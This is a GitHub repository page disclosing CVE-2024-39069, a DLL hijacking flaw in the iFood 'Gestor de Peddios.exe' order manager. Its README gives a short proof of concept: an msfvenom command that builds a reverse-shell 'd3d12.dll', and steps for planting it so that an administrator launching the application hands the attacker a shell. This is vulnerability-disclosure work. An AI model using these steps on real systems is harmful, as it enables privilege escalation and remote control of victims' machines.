Skip to content

AungSoePaing/CVE-2024-39069

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 

Repository files navigation

ifood Order Manager 'Gestor de Peddios.exe' - DLL hijacking

An attacker places a malicious DLL named "d3d12.dll" in a directory that is searched by the application before the legitimate "d3d12.dll" is found. When the application is launched, it loads the malicious DLL instead of the legitimate one, allowing the attacker to execute arbitrary code in the context of the application.

Vendor Homepage: https://gestordepedidos.ifood.com.br/

Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

POC video: https://youtu.be/oMIobV2M0T8

POC

  1. Create malicious dll file on kali linux with msfvenom

    msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
    
  2. Transfer created 'd3d12.dll' to the Windows Host from Kali as low level user access

  3. Move the created 'd3d12.dll' file to the 'C:\Gestor de Peddios\d3d12.dll' as low level user access

  4. When Administrator run the application,you will get reverse shell as administrator

About

CVE-2024-39069

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published